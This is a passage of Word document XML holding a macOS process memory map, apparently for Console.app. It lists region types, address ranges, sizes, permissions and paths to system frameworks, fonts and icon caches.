        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">IOKit                  000000010de0f000-000000010de11000 [    8K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 000000010de11000-000000010de3c000 [  172K] r-x/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLRendererFloat.bundle/GLRendererFloat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000010de3d000-000000010de45000 [   32K] r--/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLRendererFloat.bundle/GLRendererFloat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 000000010de45000-000000010dec3000 [  504K] r-x/rwx SM=COW  /System/Library/Extensions/AppleIntelBDWGraphicsMTLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsMTLDriver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000010df2c000-000000010df58000 [  176K] r--/rwx SM=COW  /System/Library/Extensions/AppleIntelBDWGraphicsMTLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsMTLDriver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010df58000-000000010df6e000 [   88K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010df7a000-000000010df7b000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010dfe7000-000000010dff7000 [   64K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC metadata        000000010dff9000-000000010dffa000 [    4K] r--/rwx SM=COW  QuartzCore_0x10dff9000 zone structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010e31c000-000000010e32f000 [   76K] r--/r-- SM=S/A  /private/var/db/uuidtext/40/37DE6A8E6C3655AE7CC4BB2B1DA8B5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010f32c000-000000010f405000 [  868K] r--/rwx SM=COW  /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Resources/AppleKeyboardLayouts-L.dat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010f405000-000000010f41e000 [  100K] r--/rwx SM=COW  /Applications/Utilities/Console.app/Contents/Resources/Assets.car</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">mapped file            000000010f41e000-000000010f424000 [   24K] r--/rwx SM=COW  </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/System/Library/PrivateFrameworks/ConsoleKit.framework/Versions/A/Resources/Assets.car</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010f424000-000000010f480000 [  368K] r--/rwx SM=COW  /System/Library/PrivateFrameworks/ConsoleKit.framework/Versions/A/Resources/search-glyph.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page      000000010f480000-000000010f481000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page      000000010f496000-000000010f498000 [    8K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page      000000010f4ad000-000000010f4ae000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 000000010f720000-000000010f768000 [  288K] r-x/rwx SM=COW  ...ions/Xcode.app/Contents/Developer/Library/PrivateFrameworks/CoreSimulator.framework/Versions/A/CoreSimulator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000010f775000-000000010f78f000 [  104K] r--/rwx SM=COW  ...ions/Xcode.app/Contents/Developer/Library/PrivateFrameworks/CoreSimulator.framework/Versions/A/CoreSimulator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010f798000-000000010f799000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010f79f000-000000010f7a2000 [   12K] r--/rwx SM=COW  /System/Library/PrivateFrameworks/ConsoleKit.framework/Versions/A/Resources/SidebarMacBook.icns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010f7a2000-000000010f7a6000 [   16K] r--/rwx SM=COW  /System/Library/PrivateFrameworks/ConsoleKit.framework/Versions/A/Resources/SidebarGenericFile.icns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010f7a6000-000000010f7a9000 [   12K] r--/rwx SM=COW  /System/Library/PrivateFrameworks/ConsoleKit.framework/Versions/A/Resources/SidebarGenericFolder.icns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mapped file            000000010f7aa000-000000010f7ab000 [    4K] r-x/r-x SM=COW  Object_id=f298275b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010f7ac000-000000010f7ad000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010f7ba000-000000010f7bb000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010f7bc000-000000010f9c6000 [ 2088K] r--/rwx SM=COW  /System/Library/Fonts/Menlo.ttc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC metadata        000000010f9d0000-000000010f9d1000 [    4K] r--/rwx SM=COW  DefaultPurgeableMallocZone_0x10f9d0000 zone structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010f9d2000-000000010f9d3000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010f9dd000-000000010f9de000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010f9ff000-000000010fa00000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000010fa04000-000000010fa06000 [    8K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fac1000-000000010fac2000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010faf7000-000000010faf8000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO               000000010fb61000-000000010fb63000 [    8K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010fb98000-000000010fb9a000 [    8K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010fbc6000-000000010fbcb000 [   20K] r--/rwx SM=COW  /private/var/folders/fv/1m56tx611tb28kv27w07st6r0000gn/C/com.apple.scriptmanager2.le.cache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc87000-000000010fc88000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc93000-000000010fc94000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fc94000-000000010fc9b000 [   28K] r--/r-- SM=ALI  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mapped file            000000010fccf000-000000010fcd1000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/E3A8F8E5-08D1-81E6-715F-8E71E189A869.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fcfe000-000000010fd00000 [    8K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010fd00000-000000010fd06000 [   24K] r--/r-- SM=ALI  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            00000001100c6000-00000001100c8000 [    8K] r--/r-x SM=PRV  /Library/Caches/com.apple.iconservices.store/4E860A0F-5BAE-8013-C24D-B1278E19A8E3.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            00000001102be000-00000001102c0000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/19EAE957-F00A-C4FD-E26A-A45965860983.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001102f5000-00000001102fb000 [   24K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 0000000110324000-0000000110326000 [    8K] r-x/rwx SM=COW  cl_kernels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             0000000110327000-0000000110328000 [    4K] r--/rwx SM=ZER  cl_kernels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      00000001103bb000-00000001103be000 [   12K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO               00000001106de000-00000001106e0000 [    8K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  00000001106e2000-00000001106e3000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO               00000001106e5000-00000001106e7000 [    8K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO               0000000110705000-0000000110707000 [    8K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO               00000001107cb000-00000001107cd000 [    8K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO               00000001107cf000-00000001107d1000 [    8K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000110c6e000-0000000110ca7000 [  228K] r--/rwx SM=COW  /System/Library/PrivateFrameworks/FinderKit.framework/Versions/A/Resources/Assets.car</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000110cbe000-0000000110ce4000 [  152K] r--/rwx SM=COW  /System/Library/Fonts/ZapfDingbats.ttf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mapped file            0000000110ce9000-0000000110ceb000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/14A025F4-24E5-1AAD-723F-8C94AA48EFB3.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000110f8e000-0000000110faf000 [  132K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111052000-0000000111054000 [    8K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001111e4000-00000001111e7000 [   12K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000011126b000-000000011128b000 [  128K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      00000001112ab000-00000001112ce000 [  140K] r--/r-- SM=ALI  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      00000001112f1000-0000000111319000 [  160K] r--/r-- SM=ALI  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00000001114a9000-00000001114ac000 [   12K] r-x/rwx SM=COW  /System/Library/Filesystems/NetFSPlugins/ftp.bundle/Contents/MacOS/ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             00000001114ad000-00000001114b1000 [   16K] r--/rwx SM=COW  /System/Library/Filesystems/NetFSPlugins/ftp.bundle/Contents/MacOS/ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001114b9000-00000001114bc000 [   12K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000011168b000-00000001116d4000 [  292K] r--/r-- SM=S/A  /private/var/db/uuidtext/08/A463B1296E3AC1B8D301A75B0785A8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000111aae000-0000000111af7000 [  292K] r--/r-- SM=S/A  /private/var/db/uuidtext/08/A463B1296E3AC1B8D301A75B0785A8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000011225f000-0000000112396000 [ 1244K] r--/rwx SM=COW  /System/Library/Fonts/SFNSDisplay.ttf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000112396000-00000001123a4000 [   56K] r--/rwx SM=COW  /System/Library/Fonts/Keyboard.ttf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      00000001134f5000-0000000113521000 [  176K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000113ec7000-0000000113f12000 [  300K] r--/r-- SM=PRV  /private/var/db/uuidtext/3F/231A37B5FB3A56B4F07A533E7F53EC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            00000001154c9000-00000001154cb000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/F3590A62-75B6-9880-5692-CB72A7CAB247.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreUI image data      0000000116499000-00000001164b9000 [  128K] r--/r-- SM=ALI  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000116ea2000-00000001171c8000 [ 3224K] r--/r-x SM=ALI  ...Assets/com_apple_MobileAsset_LinguisticData/2e428a59a8c74acf82b249f73fcbbc785b892f69.asset/AssetData/pos.dat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000117342000-0000000117346000 [   16K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000117385000-0000000117484000 [ 1020K] r--/r-x SM=ALI  /private/var/folders/fv/1m56tx611tb28kv27w07st6r0000gn/C/com.apple.iconservices/store.index</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000117516000-000000011753d000 [  156K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00000001175e8000-0000000117626000 [  248K] r-x/rwx SM=COW  /usr/lib/dyld</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000011765d000-0000000117673000 [   88K] r--/rwx SM=COW  /usr/lib/dyld</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000117673000-00000001177d5000 [ 1416K] r--/r-x SM=ALI  ...Assets/com_apple_MobileAsset_LinguisticData/2e428a59a8c74acf82b249f73fcbbc785b892f69.asset/AssetData/ner.dat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000118721000-0000000118723000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/B6CA0E46-C429-4FB2-D70A-C145F2350460.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000118788000-00000001187aa000 [  136K] r--/rwx SM=COW  /System/Library/Fonts/Apple Braille.ttf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            00000001187eb000-00000001187ed000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/AAC93FAF-2553-90AA-CEF0-99F37F882F16.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      00000001188b2000-00000001188db000 [  164K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000118a7e000-0000000118b6c000 [  952K] r--/rwx SM=COW  /System/Library/Fonts/Apple Symbols.ttf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000118b6c000-0000000118c12000 [  664K] r--/rwx SM=COW  /Library/Fonts/Kokonor.ttf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mapped file            0000000118c60000-0000000118c62000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/7B414DA5-DB12-B810-F7D9-889473F21E75.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000118c70000-0000000118c72000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/2492B86D-11A9-070B-733F-4401C01D7820.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000118cf1000-0000000118cf3000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/E2A04672-E6E7-9B87-DCB3-A4A649CA2462.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000118d0d000-0000000118d0f000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/0911A42F-0338-2864-237E-D66062EE5CCC.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000118d58000-0000000118d7d000 [  148K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000118ef6000-0000000118f28000 [  200K] r--/rwx SM=COW  /Applications/Utilities/Console.app/Contents/Resources/AppIcon.icns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 0000000118f28000-0000000118f49000 [  132K] r-x/rwx SM=COW  /System/Library/PrivateFrameworks/CoreNLP.framework/Versions/A/CoreNLP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             0000000118f4c000-0000000118f63000 [   92K] r--/rwx SM=COW  /System/Library/PrivateFrameworks/CoreNLP.framework/Versions/A/CoreNLP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000118f63000-0000000118f95000 [  200K] r--/rwx SM=COW  ...rameworks/DataDetectorsCore.framework/Versions/A/Resources/com.apple.datadetectorscore.cache.urlifier.system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000119348000-000000011939f000 [  348K] r--/r-x SM=ALI  /System/Library/PrivateFrameworks/CoreNLP.framework/Versions/A/Resources/tokruleLE.data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000119cde000-0000000119ce4000 [   24K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000119cf4000-0000000119ffd000 [ 3108K] r--/rwx SM=COW  /System/Library/Fonts/LucidaGrande.ttc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000119ffd000-000000011a24a000 [ 2356K] r--/rwx SM=COW  /System/Library/Fonts/Thonburi.ttc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mapped file            000000011a24a000-000000011eef2000 [ 76.7M] r--/rwx SM=COW  /System/Library/Fonts/PingFang.ttc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000011efa8000-000000011f239000 [ 2628K] r--/r-- SM=S/A  /private/var/db/uuidtext/C2/5C6FB8E934349C952C26CF913BAC33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
